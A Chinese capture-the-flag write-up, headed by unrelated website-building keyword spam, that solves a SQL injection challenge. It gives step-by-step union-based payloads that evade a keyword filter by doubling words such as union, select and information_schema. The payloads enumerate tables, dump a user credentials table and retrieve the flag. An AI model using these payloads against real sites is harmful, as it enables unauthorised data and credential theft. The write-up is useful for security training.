昆明市网站制作公司,手机终端网站,wordpress 侧边收起,建设部监理工程师报考网站1.这道题和之前做的几道题是相似的#xff0c;这道题考的知识点更多。难度也比之前的大一些 2.尝试万能密码 or 1#发现过滤了or,使用1和1,发现他对单引号也进行了过滤。于是我尝试进行双写绕过#xff0c;发现可以通过了。 3.由之前的做题经验可知#xff0c;这道题会涉及到…1.这道题和之前做的几道题是相似的这道题考的知识点更多。难度也比之前的大一些 2.尝试万能密码 or 1#发现过滤了or,使用1和1,发现他对单引号也进行了过滤。于是我尝试进行双写绕过发现可以通过了。 3.由之前的做题经验可知这道题会涉及到数据库
4.我们先来查询它的列数,一共有四列 5.接着查表名
1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()#使用该语句查表名时发现unionselectfromwhere都被过滤了 尝试在单词中间插入一样的字母可以绕过但是提示表不存在 经过仔细观察才发现informationz中有or所以也要使用双写绕过 6.得到了表名b4bsql,geekuser接下来查表中字段
使用下面命令爆第一张表的字段
1 ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_nameb4bsql# 使用下面命令爆第二张表的字段
1 ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_namegeekuser# 7.字段有了接下来爆字段中的信息
先使用下面命令查询第一张表中字段信息
1 ununionion selselectect 1,2,group_concat(id,username,password) frfromom geekuser# 8.这里没有得到flag可能是我遗漏了什么查了资料才发现flag可能不在我们当前这个数据库里面想到一开始我还没查询库名不知道它有几个苦命于是使用下面命令进行数据库库名查询
查完才知道原来它不止一个库
1 ununionion selselectect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata# 9.使用下面指令查flag
1 ununionion selselectect 1,2,flag frfromom 库名.Flag# 10.经过不断的试库终于在ctf库中得到了flag
使用的命令为
1 ununionion selselectect 1,2,flag frfromom ctf.Flag#
flag{e2f874de-5c8c-47ea-b8ac-b4f5a42bf231}
